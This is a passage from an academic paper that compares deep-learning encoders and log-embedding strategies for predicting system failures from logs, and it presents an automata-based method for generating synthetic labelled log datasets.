cover the main DL types in addition to the recently emerged mechanism of attention, as mentioned in SS 3. **LSTM-based.** This DL model is inspired by the LSTM architecture suggested by related works, including DeepLog [18], Aarohi [13], and Dash [12]. The model has one hidden layer of LSTM with 128 nodes and ReLU activation. A dropout layer with a rate of \(0.1\) is applied to make the model generalise better. The output of the model is a feature vector of size \(128\). **BiLSTM-based.** The model has an architecture similar to LogRobust, which was proposed for anomaly detection. Due to its RNN-based architecture, its output is a feature vector with the same size as the input log sequence length [60]. **CNN-based.** The CNN architecture is a variation of the convolutional design of the CNN-based anomaly detection model [36]. Based on our preliminary experimental results, \(20\) filters, instead of one, for each of the three 1D convolutions (see SS 2.4.2) are used in parallel to capture relationships between log templates at different distances. To ensure that the feature maps of each convolution have the same dimension as the input, the padding technique is used. Hence, the length of the output feature vector is the product of the number of filters (20), the number of convolutions (3), and the input size of the log sequence. **Transformer-based.** Our architecture of the transformer model is inspired by recent work in anomaly detection [31, 25, 41]. 
**Transformer-based.** Our architecture of the transformer model is inspired by recent work on anomaly detection [31, 25, 41]. The model is composed of two main parts: positional embedding and transformer blocks. One transformer block is adopted after positional embedding, set similarly to a recent study [31]. After global average pooling, the output matrix is mapped into one feature vector of the same size as the log template embedding (\(\theta=768\)), previously explained in § 2.4.

## 5 Empirical Study Design

### Research Questions

The goal of this study is to systematically evaluate the performance of failure predictors, obtained by instantiating our base architecture with different combinations of DL encoders and log sequence embedding strategies, for various datasets with different characteristics. The ultimate goal is to rely on such analyses _to introduce practical guidelines to select the right failure prediction model based on the characteristics of a given dataset_. To achieve this, we investigate the following research questions:

* **RQ1:** What is the impact of different DL encoders on failure prediction accuracy?
* **RQ2:** What is the impact of different log sequence embedding strategies on failure prediction accuracy?
* **RQ3:** What is the impact of different dataset characteristics on failure prediction accuracy?

RQ1 and RQ2 investigate how failure prediction accuracy varies across DL encoders and embedding strategies reported in the literature. Most of them have been evaluated in isolation or with respect to a few alternatives, often using ad-hoc benchmarks (see § 3 for a detailed comparison). To address this, we comprehensively consider all variations of our base architecture, obtained by combining four DL encoders (LSTM, CNN, transformer, and BiLSTM) with two log sequence embedding strategies (Logkey2vec and BERT) that have been widely used in failure prediction and anomaly detection. Furthermore, we systematically vary the characteristics of the input datasets in terms of the number of log sequences, the length of log sequences, and the proportion of normal log sequences. The answers to these questions are expected to lead to practical guidelines for choosing the best failure prediction model given a dataset with certain characteristics. RQ3 additionally investigates the impact of the input dataset characteristics on failure prediction accuracy, with a focus on the best DL encoder and log sequence embedding strategy found in RQ1 and RQ2. The answer to this question will help us better understand under which conditions the combination of the best DL encoder and log sequence embedding strategy works sufficiently well for practical use, possibly leading to practical guidelines for preparing input datasets that increase failure prediction accuracy.

### Methodology

As discussed in § 4, we can instantiate the base architecture for failure prediction with different DL encoders and log sequence embedding strategies. To answer RQ1 and RQ2, we train different configurations of the base architecture while systematically varying the training datasets' characteristics (e.g., size and failure types). Then, we evaluate the relative performance of the configurations in terms of failure prediction accuracy, using test datasets having the same characteristics but not used during training. To answer RQ3, we analyze the results of the best configuration (i.e., the best DL encoder and log sequence embedding strategy) identified in RQ1 and RQ2.
Specifically, we build regression trees [4] to automatically infer conditions describing how the failure prediction accuracy of the best configuration varies according to the dataset characteristics.

#### 5.2.1 Log Sequence Embedding Strategies and DL Encoders

As for the different log sequence embedding strategies, we consider Logkey2vec and BERT, which have been shown to be accurate in the literature, as discussed in § 4.1. For BERT, we use the original pretrained model with 512 input tokens, where each token is represented as a 768-dimensional embedding vector. For Logkey2vec, we set the size of an embedding vector to be the same as BERT's for a fair comparison. Also, Logkey2vec has an additional parameter: the vocabulary size. We set it to 200, which is large enough for all datasets used in our evaluation.

As for the different DL encoders in RQ1 and RQ2, we consider four encoders that have been previously used in failure prediction and anomaly detection. We configured the encoders based on the recommendations reported in the literature (see § 4.2 for further details).

#### 5.2.2 Datasets with Different Characteristics

As for the characteristics of datasets, we consider four factors that are expected to affect failure prediction performance: (1) dataset size (i.e., the number of logs in the dataset), (2) log sequence length (LSL) (i.e., the length of a log sequence in the dataset), (3) failure percentage (i.e., the percentage of log sequences with failure patterns in the dataset), and (4) failure pattern type (i.e., the type of failures).

The dataset size is important to investigate to assess the training efficiency of different DL models. To consider a wide range of dataset sizes while keeping the number of all combinations of the four factors tractable, we consider six levels that cover the range of real-world dataset sizes reported in a recent study [32]: 200, 500, 1 000, 5 000, 10 000, and 50 000.

The LSL could affect failure prediction since a failure pattern that spans a longer log might be more difficult to predict correctly. Similar to the lengths observed in real-world log sequences across publicly available datasets [32], we vary the maximum2 LSL across five levels: 20, 50, 100, 500, and 1 000.

Footnote 2: We set the maximum LSL to simplify control.

The failure percentage determines the balance of classes in a dataset, which may affect the performance of DL models [27]. A dataset is perfectly balanced when the failure percentage is 50%. However, the failure percentage can be much less than 50% in practice, as observed in real-world datasets [33]. Therefore, we vary the failure percentage across six levels: 5%, 10%, 20%, 30%, 40%, and 50%.

Regarding failure patterns, we aim to consider patterns with potential differences in terms of learning effectiveness. However, failure patterns defined in previous studies are too simple; for example, Das et al. [12] consider a specific, consecutive sequence of problematic log templates, called a "failure chain". But in practice, not all problematic log templates appear consecutively in a log. To address this, we use regular expressions to define failure patterns, allowing non-consecutive occurrences of problematic log templates. For example, a failure pattern "\(x(y|z)\)" indicates a pattern composed of two consecutive templates that starts with template \(x\) and ends with either template \(y\) or template \(z\).
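To make this concrete, such a failure pattern can be checked against a log sequence with ordinary regular-expression matching. The sketch below uses hypothetical single-character template IDs; real template IDs would need a separator or a mapping to single symbols.

```python
import re

# Hypothetical failure pattern: starts with template 'x' and ends with
# either template 'y' or template 'z'.
failure_pattern = re.compile(r"x(y|z)")

def is_failure(log_sequence, pattern=failure_pattern):
    """log_sequence: sequence of single-character template IDs, e.g. ['x', 'z']."""
    return pattern.fullmatch("".join(log_sequence)) is not None

print(is_failure(["x", "z"]))  # True: matches x(y|z)
print(is_failure(["x", "w"]))  # False: does not match
```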
In addition, we consider two types of failure patterns (in the form of regular expressions), _Type-F_ and _Type-I_, depending on the cardinality of the languages accepted by the regular expressions (_finite_ and _infinite_, respectively). This is because, if the cardinality of the language is finite, DL models might memorise (almost) all the finite instances (i.e., sequences of log templates) instead of learning the failure pattern. For example, the language defined by the regular expression "\(x(y|z)\)" is finite since there are only two template sequences (i.e., \(xy\) and \(xz\)) matching the expression "\(x(y|z)\)". In this case, the two template sequences might appear in the training set, making it straightforward for DL models to simply memorise them. In contrast, the language defined by the regular expression "\(x^{*}(y|z)\)" is infinite due to the infinitely many template sequences that can match the sub-expression "\(x^{*}\)"; therefore, simply memorising some of the infinitely many sequences matching "\(x^{*}(y|z)\)" would not be enough to achieve high failure prediction accuracy.

To sum up, we consider 360 combinations (six dataset sizes, five maximum LSLs, six failure percentages, and two failure pattern types) in our evaluation. However, we could not use publicly available datasets for our experiments for the following reasons. First, although He et al. [22] reported several datasets in their survey paper, they are mostly labeled based on the occurrence of error messages (e.g., log messages with the level of ERROR) instead of considering failure patterns (e.g., sequences of certain messages). Furthermore, there are no publicly available datasets covering all the combinations of the four factors defined above, making it impossible to thoroughly investigate their impact on failure prediction. To address this issue, we present a novel approach for synthetic log data generation in § 5.3.

#### 5.2.3 Failure Predictor Training and Testing

We split each artificially generated dataset into two disjoint sets, a training set and a test set, with a ratio of 80:20. Further, 20% of the training set is separated as a validation set, which is used for early stopping [44] during training to avoid over-fitting. For training failure predictors, to control the effect of highly imbalanced datasets, oversampling [52] is performed on the minority class (i.e., failure logs) to achieve a 50:50 ratio of normal to failure logs in the training dataset. For all the training datasets, we use the Adam optimizer [30] with a learning rate of 0.001 and the sparse categorical cross-entropy loss function [7], given the Boolean output (i.e., failure or not) of the models.
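The following Keras sketch summarises this training setup (Adam with a learning rate of 0.001, sparse categorical cross-entropy, early stopping on the 20% validation split, and oversampling of the failure class). It is only an illustration: the oversampling helper is a naive stand-in for the technique of [52], and the early-stopping patience value is an assumption.

```python
import numpy as np
import tensorflow as tf

def oversample_minority(X, y, seed=0):
    """Duplicate failure examples (label 1) until classes are balanced 50:50.
    Naive illustrative helper; assumes failures are the minority class."""
    rng = np.random.default_rng(seed)
    minority, majority = np.flatnonzero(y == 1), np.flatnonzero(y == 0)
    extra = rng.choice(minority, size=len(majority) - len(minority), replace=True)
    idx = rng.permutation(np.concatenate([majority, minority, extra]))
    return X[idx], y[idx]

def train_failure_predictor(model, X_train, y_train, batch_size, epochs):
    """Train any instantiation of the base architecture with the settings above."""
    X_bal, y_bal = oversample_minority(X_train, y_train)
    model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=0.001),
                  loss="sparse_categorical_crossentropy", metrics=["accuracy"])
    early_stop = tf.keras.callbacks.EarlyStopping(monitor="val_loss", patience=3,
                                                  restore_best_weights=True)
    return model.fit(X_bal, y_bal, validation_split=0.2,  # 20% as validation set
                     batch_size=batch_size, epochs=epochs, callbacks=[early_stop])
```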
However, we use different batch sizes and numbers of epochs for datasets with different characteristics, since these characteristics (particularly the dataset size, the maximum LSL, and the failure percentage) affect the convergence speed of the training error. It would, however, be impractical to fine-tune the batch size and the number of epochs for 360 individual combinations. Therefore, based on our preliminary evaluation results, we use larger batch sizes with fewer epochs for larger datasets to keep the training time reasonable without significantly affecting training effectiveness. Specifically, we set the two hyperparameters as follows:

* _Batch size_: By default, we set it to 10, 15, 20, 30, 150, and 300 for dataset sizes of 200, 500, 1 000, 5 000, 10 000, and 50 000, respectively. If the failure percentage is less than or equal to 30% (meaning more oversampling will happen to balance normal and failure logs, increasing the training data size), then we increase the batch size to 10, 15, 30, 60, 300, and 600, respectively, to reduce training time. Furthermore, regardless of the failure percentage, we set the batch size to 5 if the maximum LSL is greater than or equal to 500, to prevent memory issues during training.
* _Number of epochs_: By default, we set it to 20. If the maximum LSL is greater than or equal to 500, we reduce the number of epochs to 10, 10, 5, and 5 for dataset sizes of 1 000, 5 000, 10 000, and 50 000, respectively, to reduce training time.

Table 2 summarises the above conditions, where FP is the failure percentage and MLSL refers to the maximum LSL.

\begin{table} \begin{tabular}{c c c c c c c c} \hline \hline \multirow{2}{*}{**Hyperparameter**} & \multirow{2}{*}{**Condition**} & \multicolumn{6}{c}{**Dataset Size**} \\ & & 200 & 500 & 1 000 & 5 000 & 10 000 & 50 000 \\ \hline \multirow{3}{*}{Batch Size} & Default & 10 & 15 & 20 & 30 & 150 & 300 \\ & FP \(\leq 30\) & 10 & 15 & 30 & 60 & 300 & 600 \\ & MLSL \(\geq 500\)* & 5 & 5 & 5 & 5 & 5 & 5 \\ \hline \multirow{2}{*}{Number of Epochs} & Default & 20 & 20 & 20 & 20 & 20 & 20 \\ & MLSL \(\geq 500\) & 20 & 20 & 10 & 10 & 5 & 5 \\ \hline \hline \end{tabular} * This condition has higher priority than the others. \end{table} Table 2: Overview of Hyperparameter Setting

Once failure predictors are trained, we measure their accuracy on the corresponding test set in terms of precision, recall, and F1 score. We conducted all experiments in the cloud computing environments provided by the Digital Research Alliance of Canada [16], on the Cedar cluster with a total of 94 528 CPU cores for computation and 1 352 GPU devices.

### Synthetic Data Generation

In defining a set of factors, the methodology described in § 5.2 makes it clear that there is a need for a mechanism that can generate datasets in a controlled, unbiased manner. For example, let us consider the factor of failure percentage (§ 5.2.2). Such a factor requires that one be able to control whether the log sequence being generated does indeed correspond to a failure; this would ultimately allow one to control the percentage of failure log sequences in a generated dataset. While, for smaller datasets, one could imagine manually choosing log sequences that represent both failures and normal behaviour, for larger datasets this is not feasible. When considering the other factors defined in § 5.2, such as _LSL_, the case for a mechanism for automated, controlled generation of datasets becomes even stronger.

#### 5.3.1 Key Requirements

We now describe a set of requirements that must be met by whatever approach we opt to take for generating datasets. In particular, our approach should:

**R1 - Allow datasets' characteristics to be controlled.** This requirement has already been described, but we summarise it here for completeness. We must be able to generate datasets for each combination of levels (of the factors defined in § 5.2). Hence, our approach must allow us to choose a combination of levels and generate a dataset accordingly.

**R2 - Be able to generate realistic datasets.** A goal of this work is to present results that are applicable to real-world systems. Hence, we must require that the datasets with which we perform any evaluations reflect real-world system behaviours.
**R3 - Be able to generate datasets corresponding to a diverse set of systems.** While we require that the datasets we use be realistic, we must also ensure that the data generator can be applied to any system for which the required model of its behaviour is available (see § 5.3.2), rather than being limited to a single system.

**R4 - Avoid bias in the log sequences that make up the generated datasets.** The previous requirement ensures that we do not introduce an approach that only works with one system. If our approach were to work solely with one system, we might say that it was biased at the _use case level_. The second kind of bias is at the log-sequence level. For example, for a given system, we wish to generate datasets containing log sequences that explore as much of the system's behaviour as possible (rather than being biased towards a particular part of the system).

#### 5.3.2 Automata for System Behaviour

Our approach is based on finite-state automata. In particular, we use automata as approximate models of the behaviour of real-world systems. We refer to such automata as _behaviour models_, since they represent the computation performed by (i.e., the behaviour of) some real-world system. We chose automata, or behaviour models, because some of our requirements are met immediately:

**R2.** Existing tools [49, 54] allow one to infer behaviour models of real-world systems from collections of these systems' logs (in a process called _model inference_). Such models attach log messages to transitions, which is precisely what we need. Importantly, the collections of logs used are unlabelled, meaning that the models we get from these tools have no existing notion of normal behaviour or failures.

**R3.** A result of meeting R2 is that one can easily infer behaviour models for multiple systems, provided the logs of those systems are accessible.

The remaining sections give the complete details of our automata-based data generation approach. In presenting these details, we will show how R1 and R4 are met.

#### 5.3.3 Behaviour Models

We take a behaviour model \(\mathcal{M}\) to be a deterministic finite-state automaton \(\langle Q,A,q_{0},\Sigma,\delta\rangle\), with symbols as defined in § 2.1. A behaviour model has the particular characteristic that its alphabet \(\Sigma\) consists of _log template IDs_ (see § 2.2). A direct consequence of this is that one can extract log sequences from behaviour models. In particular, if one considers a sequence of states (i.e., a path) \(q_{0},q_{i},q_{i+1},\ldots,q_{n}\) through the model, one can extract a sequence of log template IDs using the transition function \(\delta\). For example, if the first two states of the sequence are \(q_{0}\) and \(q_{i}\), then one need only find \(s\in\Sigma\) such that \(\delta(q_{0},s)=q_{i}\), i.e., it is possible to transition from \(q_{0}\) to \(q_{i}\) by observing \(s\). Finally, by replacing each log template ID in the resulting sequence with its corresponding log template, one obtains a _log sequence_ (see § 2.2). These sequences can be divided into two categories: _failure log sequences_ and _normal log sequences_. We describe failures using regular expressions. This is natural since behaviour models are finite-state automata, and sets of paths through such automata can be described by regular expressions. Hence, we refer to such a regular expression as a _failure pattern_, and denote it by _fp_.
By extension, for a given behaviour model \(\mathcal{M}\), we denote by \(\mathsf{failurePatterns}(\mathcal{M})\) the set \(\{\textit{fp}_{1},\textit{fp}_{2},\ldots,\textit{fp}_{n}\}\) of failure patterns paired with the model \(\mathcal{M}\). Based on this, we characterise _failure log sequences_ as follows:

**Failure log sequence.** For a system whose behaviour is represented by a behaviour model \(\mathcal{M}\), we say that a log sequence represents a failure of the system whenever its sequence of log template IDs matches some failure pattern \(\textit{fp}\in\mathsf{failurePatterns}(\mathcal{M})\).

Since this definition of failure log sequences essentially captures a subset of the possible paths through \(\mathcal{M}\), we define normal log sequences as those log sequences that are not failures:

**Normal log sequence.** For a system whose behaviour is represented by a behaviour model \(\mathcal{M}\), we say that a log sequence \(l\) is normal, i.e., it represents normal behaviour, whenever \(l\in\mathcal{L}(\mathcal{M})\) and \(l\not\in\bigcup_{\textit{fp}\in\mathsf{failurePatterns}(\mathcal{M})}\mathcal{L}(\textit{fp})\) (we take \(\mathcal{L}(\mathcal{M})\) and \(\mathcal{L}(\textit{fp})\) to be as defined in § 2.1). Hence, defining a normal log sequence requires that we refer to both the language of the model \(\mathcal{M}\) and the languages of all failure patterns associated with the model \(\mathcal{M}\).

#### 5.3.4 Generating Log Sequences for Failures

Let us suppose that we have inferred a model \(\mathcal{M}\) from the execution logs of some real-world system, and that we have defined the set \(\mathsf{failurePatterns}(\mathcal{M})\). Then we generate a failure log sequence that matches some \(\mathit{fp}\in\mathsf{failurePatterns}(\mathcal{M})\) by:

1. Computing a subset of \(\mathcal{L}(\mathit{fp})\). We do this by repeatedly generating single members of \(\mathcal{L}(\mathit{fp})\); ultimately, this leads to the construction of a subset of \(\mathcal{L}(\mathit{fp})\). In practice, the Python package _exrex_ [51] can be used to generate random words from the language \(\mathcal{L}(\mathit{fp})\), so we invoke this library repeatedly. Even if the language of the regular expression is infinite, we can run _exrex_ multiple times, each time generating a random string from the language. The number of runs is set based on our preliminary results with respect to the range of dataset sizes (2 500 times for each failure pattern). Doing this, we generate a subset of \(\mathcal{L}(\mathit{fp})\).
2. Choosing at random a log sequence \(l\), with \(|l|\leq\mathit{mlsl}\), from the subset of \(\mathcal{L}(\mathit{fp})\) computed in the previous step, where _mlsl_ refers to the maximum LSL (see § 5.2.2). The Python package _random_ [43] was employed for this. We highlight that failure patterns are designed so that there is always at least one failure pattern that can generate log sequences whose length falls within this bound. More details on this are provided in § 5.4.
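A hedged sketch of this two-step procedure is shown below, again over single-character template IDs. The failure pattern, the number of samples, and the _mlsl_ value are illustrative only, and the sketch assumes that `exrex.getone` returns one random string matching the given expression.

```python
import random
import exrex  # pip install exrex

def generate_failure_sequence(fp, n_samples=2500, mlsl=20, seed=0):
    """Step 1: sample candidate words from L(fp); Step 2: pick one short enough.
    `fp` is a failure pattern over single-character template IDs (illustrative)."""
    random.seed(seed)
    # Step 1: repeatedly draw random members of L(fp) with exrex.
    candidates = {exrex.getone(fp) for _ in range(n_samples)}
    # Step 2: keep only sequences within the maximum LSL and pick one at random.
    short_enough = [w for w in candidates if len(w) <= mlsl]
    return random.choice(short_enough)

print(generate_failure_sequence(r"x*(y|z)"))  # e.g. 'xxy'
```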
For requirement R4, since our approach relies on the random selection of log sequences from languages generated by the _exrex_ tool, we highlight that the bias in our approach is subject to the implementation of both _exrex_ and the Python package _random_. _Exrex_ is a popular RegEx package with more than 100k monthly downloads. Its method for generating a random matching sequence is implemented by a random selection of choices over the RegEx's parse tree nodes. The _random_ package uses the Mersenne Twister algorithm [37] to generate uniform pseudo-random numbers used for random selection tasks.

#### 5.3.5 Generating Log Sequences for Normal Behaviour

While our approach defines how failures should look using a set of failure patterns \(\mathsf{failurePatterns}(\mathcal{M})\) defined over a model \(\mathcal{M}\), we have no such definition of how normal behaviour should look. Instead, this is left implicit in our behaviour model. However, based on the definition of normal log sequences given in § 5.3.3, such log sequences can be randomly generated by performing random walks on behaviour models. This fact forms the basis of our approach to generating log sequences for normal behaviour. However, we must also address two key issues: 1) the log sequences generated by our random walk must be of bounded length, and 2) the log sequences must also lack bias. There are two reasons for enforcing a bound on the length of log sequences:

* Deep learning models (such as CNN) often accept inputs of limited size, so we have to ensure that the data we generate is compatible with the models we use.
* One of the factors introduced in § 5.2 is LSL, so we need to be able to control the length of the log sequences that we generate.

For bias, we have two sources: 1) bias towards specific regions of the behaviour model, and 2) bias towards limited variation in LSL. We must minimise bias in both cases. Algorithm 1 gives our procedure for randomly generating a log sequence representing normal behaviour of a system; Algorithm 1 itself makes use of Algorithm 2.

```
Input:  \(\mathcal{M}\): behaviour model, \(\mathit{mlsl}\): int
Output: \(\mathit{sequence} = \langle s_{1},s_{2},\dots,s_{n}\rangle\in\mathcal{L}(\mathcal{M})\)
1: \(\mathit{sequence}\): list \(\leftarrow\) filteredRandomWalk(\(\mathcal{M}\), \(\mathit{mlsl}\))
2: while \(\mathit{sequence}\in\bigcup_{\mathit{fp}_{i}\in\mathsf{failurePatterns}(\mathcal{M})}\mathcal{L}(\mathit{fp}_{i})\) do
3:     \(\mathit{sequence}\leftarrow\) filteredRandomWalk(\(\mathcal{M}\), \(\mathit{mlsl}\))
4: return \(\mathit{sequence}\)
```
**Algorithm 1:** _generateNormalSequence_

In particular, Algorithm 1 generates a normal log sequence by:

1. Generating a random log sequence by a random walk (invoking Algorithm 2);
2. Looking for a failure pattern \(\mathit{fp}\in\mathsf{failurePatterns}(\mathcal{M})\) that matches the generated log sequence;
3. Repeating until a log sequence is generated that matches no failure pattern.

Ultimately, Algorithm 1 is relatively lightweight; the bulk of the work is performed by Algorithm 2, which we now describe in detail. The input arguments of Algorithm 2, which defines the procedure _filteredRandomWalk_, are a behaviour model \(\mathcal{M}\) and the maximum LSL, _mlsl_. The algorithm proceeds as follows. First, on line 1, we invoke the _calculateSValues_ function to compute a map that sends each state \(q\in Q\) of \(\mathcal{M}\) to the length of the shortest path from that state to an accepting state in \(A\). Next, on line 2, the _sequence_ variable is initialised to an empty sequence. As the algorithm progresses, this variable stores the generated sequence of log template IDs. To help with this, the variable _currentState_ keeps track of the state that the algorithm is currently in during the walk of the behaviour model; it is initialised on line 4 to the initial state.
The final step in the setup stage of our algorithm is to initialise the _maximumWalk_ variable, which serves as a counter to ensure that the limit on the length of the generated log sequence (defined by _mlsl_) is respected. In the while loop (line 5), as long as the current state, _currentState_, is not yet an accepting state, the random walk moves from the current state to a new state. The set of possible transitions to take is computed on line 7 and stored in the variable _transitions_. Each transition is represented by a triple containing the starting state, the symbol to be observed, and the state resulting from the observation of that symbol. Once this set has been computed, the algorithm performs a filtering step. In particular, in order to ensure that we respect the limit imposed on the length of the generated path by _mlsl_, we only consider transitions that lead to a state \(q^{\prime}\) such that \(\mathit{sValue}(q^{\prime})<\mathit{maximumWalk}\). The resulting list of valid options is then held in the variable _options_. Once the set _options_ has been computed, one transition \(\langle q,s,q^{\prime}\rangle\) is chosen randomly from it (line 13). This random choice eliminates bias because, each time we choose the next state to transition to, we do not favour any particular state (there is no weighting involved). This, extended over an entire path, means that we do not favour any particular region of a behaviour model. Now, from the randomly chosen transition \(\langle q,s,q^{\prime}\rangle\), the log template ID \(s\) is added to _sequence_ (via sequence concatenation); _currentState_ is updated to the next state, \(q^{\prime}\); and _maximumWalk_ is decreased by one. Based on the condition of the while loop (line 5), when _currentState_ \(\in A\) (i.e., the algorithm has reached an accepting state), the generated sequence _sequence_ is returned.

While Algorithm 2 generates an unlabelled log sequence, Algorithm 1 generates a normal log sequence. To do this, it starts by generating a log sequence by invoking the _filteredRandomWalk_ procedure (Algorithm 2). Since the sequence generated by Algorithm 2 is unlabelled, we must ensure that we do not return a failure log sequence. We do this by checking whether the generated log sequence, _sequence_, belongs to the language of any failure pattern in failurePatterns(\(\mathcal{M}\)). If this is indeed the case, another sequence must be generated. This process is repeated (line 2) until the log sequence generated by the call of _filteredRandomWalk_ does not match any failure pattern in failurePatterns(\(\mathcal{M}\)). Once such a normal log sequence has been generated, it is returned. We acknowledge that this process could be inefficient (since we are repeatedly generating log sequences until we get one with the characteristics that we need). However, we highlight that failure patterns describe only a small part of a behaviour model (this is essentially the assumption that failure is a relatively uncommon event in a real system). Hence, normal log sequences can be generated by random walks without too many repetitions.
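To make the two procedures more concrete, the following Python sketch reimplements them over a dict-based DFA. It is an illustration of the described procedure, not the authors' implementation: the model representation, the initialisation of _maximumWalk_ to _mlsl_, and the use of single-character template IDs (so that failure patterns can be matched with `re`) are all assumptions, and the sketch assumes _mlsl_ is large enough for the filtering step to always leave at least one option.

```python
import random
import re
from collections import deque

def calculate_s_values(delta, accepting):
    """Shortest distance (in transitions) from each state to an accepting state."""
    reverse = {}
    for (q, s), q2 in delta.items():          # delta: {(state, symbol): next_state}
        reverse.setdefault(q2, []).append(q)
    dist, queue = {q: 0 for q in accepting}, deque(accepting)
    while queue:                               # reverse breadth-first search
        q = queue.popleft()
        for p in reverse.get(q, []):
            if p not in dist:
                dist[p] = dist[q] + 1
                queue.append(p)
    return dist

def filtered_random_walk(q0, accepting, delta, mlsl):
    """Sketch of Algorithm 2: bounded, unweighted random walk over template IDs."""
    s_value = calculate_s_values(delta, accepting)
    sequence, current, maximum_walk = [], q0, mlsl
    while current not in accepting:
        transitions = [(q, s, q2) for (q, s), q2 in delta.items() if q == current]
        options = [t for t in transitions
                   if s_value.get(t[2], float("inf")) < maximum_walk]
        _, s, q2 = random.choice(options)      # uniform choice: no weighting
        sequence.append(s)
        current, maximum_walk = q2, maximum_walk - 1
    return sequence

def generate_normal_sequence(q0, accepting, delta, failure_patterns, mlsl):
    """Sketch of Algorithm 1: resample until no failure pattern matches."""
    seq = filtered_random_walk(q0, accepting, delta, mlsl)
    while any(re.fullmatch(fp, "".join(seq)) for fp in failure_patterns):
        seq = filtered_random_walk(q0, accepting, delta, mlsl)
    return seq
```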
**Correctness and lack of bias.** We now provide a sketch proof of the correctness of Algorithm 2, along with an argument that the algorithm eliminates bias. To prove correctness, we show that, for a behaviour model \(\mathcal{M}\), the algorithm always generates a sequence of log template IDs that corresponds to the transitions along a path through \(\mathcal{M}\). The algorithm begins at \(q_{0}\), by setting _currentState_ to \(q_{0}\) (line 4). From \(q_{0}\), and each successive state in the path, the possible next states must be adjacent to _currentState_ (line 7). Hence, the final value of _sequence_ after the while-loop at line 5 must be a sequence of log template IDs that corresponds to the transitions along a path through \(\mathcal{M}\). Further, we must show that the sequence of log template IDs generated does not only correspond to a path through the behaviour model, but is also of length at most _mlsl_ (one of the inputs of Algorithms 1 and 2). This is ensured by three factors:

* The initialisation of the variable _maximumWalk_ on line 3.
* The subsequent decrease by one of that variable each time a new log template ID is added to _sequence_.
* The filtering of the possible next states in the random walk on line 9. In particular, on line 9 we ensure that, no matter which state we transition to, there will be a path that 1) leads to an accepting state; and 2) has length less than _maximumWalk_.

Finally, bias is minimised by two factors:

* On line 13, we choose a random next state. Of course, here we rely on the implementation of random choice that we use.
* On line 9, while we respect the maximum length of the sequence of log template IDs, we do not enforce that this maximum is reached. Hence, we can generate paths of various lengths.

**Example.** To demonstrate Algorithm 2, we now perform a random walk over the behaviour model shown in Figure 3. We start with the behaviour model's initial state, \(q_{0}\), with _mlsl_ set to 5. Since \(q_{0}\not\in A\), we can execute the body of the while-loop at line 5. Hence, we determine the set _transitions_ of transitions leading out of \(q_{0}\):

\[\{\langle q_{0},a,q_{2}\rangle,\langle q_{0},b,q_{2}\rangle,\langle q_{0},c,q_{1}\rangle,\langle q_{0},d,q_{1}\rangle\}.\]

Our next step is to filter these transitions to ensure that the state that we move to allows us to reach an accepting state within _maximumWalk_ states. To do this, we filter the set _transitions_ with respect to the values in Table 3. After this filtering step, the resulting set, _options_, is

\[\{\langle q_{0},a,q_{2}\rangle,\langle q_{0},b,q_{2}\rangle,\langle q_{0},c,q_{1}\rangle,\langle q_{0},d,q_{1}\rangle\};\]

all transitions in _transitions_ are safe to take. To take one transition as an example, \(\langle q_{0},a,q_{2}\rangle\) has \(\mathit{sValue}(q_{2})=1<5\), so it is kept. Once we have computed _options_, we choose a transition at random. In this case, we arrive at \(\langle q_{0},c,q_{1}\rangle\), meaning that we set _currentState_ to \(q_{1}\) and add \(c\) to _sequence_. Before we progress to the next iteration of the main loop of the algorithm, we also decrease _maximumWalk_. This means that, during the next iteration of the while loop, we will only be able to choose transitions leading to states from which an accepting state is reachable within fewer than 4 steps. Indeed, from \(q_{1}\), there are four transitions, for which we compute the set

\[\{\langle q_{1},a,q_{0}\rangle,\langle q_{1},b,q_{1}\rangle,\langle q_{1},c,q_{3}\rangle,\langle q_{1},d,q_{3}\rangle\}.\]

From this set, each possible next state has an _sValue_ smaller than _maximumWalk_ (now equal to 4), so all of them are possible options for the next step. Suppose that we choose \(\langle q_{1},a,q_{0}\rangle\) at random. Hence, \(q_{0}\) is the next state and \(a\) is added to _sequence_.
For the remaining steps, a possible run of the procedure could yield the sequence of transitions \(\langle q_{0},b,q_{2}\rangle\), \(\langle q_{2},d,q_{1}\rangle\), \(\langle q_{1},d,q_{3}\rangle\), in which case the final sequence of log template IDs would be \(c,a,b,d,d\).

Figure 3: An example of a behaviour model.

\begin{table} \begin{tabular}{|c|c|} \hline **state** & **s value** \\ \hline \hline \(q_{0}\) & 2 \\ \(q_{1}\) & 1 \\ \(q_{2}\) & 1 \\ \(q_{3}\) & 0 \\ \hline \end{tabular} \end{table} Table 3: s values for each state

#### 5.3.6 A summary of requirements met

We now describe how the approach presented above meets the remaining requirements set out in § 5.3.1. R1 is met because we have two procedures for generating failure log sequences (§ 5.3.4) and normal log sequences (§ 5.3.5). By having these procedures, we can precisely control the number of each type of log sequence in our dataset. R4 is met because of the randomisation used in our data generation algorithms, described in Sections 5.3.4 and 5.3.5.

### Experimental Setting for Synthetic Data Generation

To generate diverse log datasets with the characteristics described in § 5.2.2, using the synthetic data generation approach described in § 5.3, we need two main artifacts: _behavior models_ and _failure patterns_.

#### 5.4.1 Behavior Models

Regarding behavior models, as discussed in § 5.3.2, we can infer accurate models of real-world systems from their execution logs using state-of-the-art model inference tools, i.e., MINT [54] and PRINS [49]. Among the potential models we could generate using the replication packages of these tools, we choose models that satisfy the following criteria, based on the model size and inference time reported by Shin et al. [49]:

1. The model should be able to generate (accept) a log with a maximum length of 20 (i.e., the shortest maximum LSL defined in § 5.2.2);
2. Since there is no straightforward way of automatically generating failure patterns for individual behavior models considering the two failure pattern types, we had to manually generate failure patterns (detailed in § 5.4.2). Therefore, the size of the model should be amenable to manually generating failure patterns by taking into account the model structure (i.e., the number of all states and transitions is less than 1 000);
3. The model inference time should be less than 1 hour; and
4. If we can use both PRINS and MINT to infer a model that satisfies the above criteria for the same logs, then we use PRINS, which is much faster than MINT in general, to infer the model.

As a result, we use the following three models as our behavior models: \(\mathcal{M}_{1}\) (generated from NGLClient logs using PRINS), \(\mathcal{M}_{2}\) (generated from HDFS logs using MINT), and \(\mathcal{M}_{3}\) (generated from Linux logs using MINT). Table 4 reports the size of the three behavior models in terms of the number of templates (#Templates), states (#States), and transitions (#Transitions). It additionally shows the number of states in the largest strongly connected component (#States-NSCC) [2], which indicates the complexity of a behavior model (the higher, the more complex).

#### 5.4.2 Failure Patterns

Regarding failure patterns, recall that a failure pattern _fp_ of a behavior model \(\mathcal{M}\) is a regular expression such that \(\mathcal{L}(\textit{fp})\subset\mathcal{L}(\mathcal{M})\), as described in § 5.3.3.
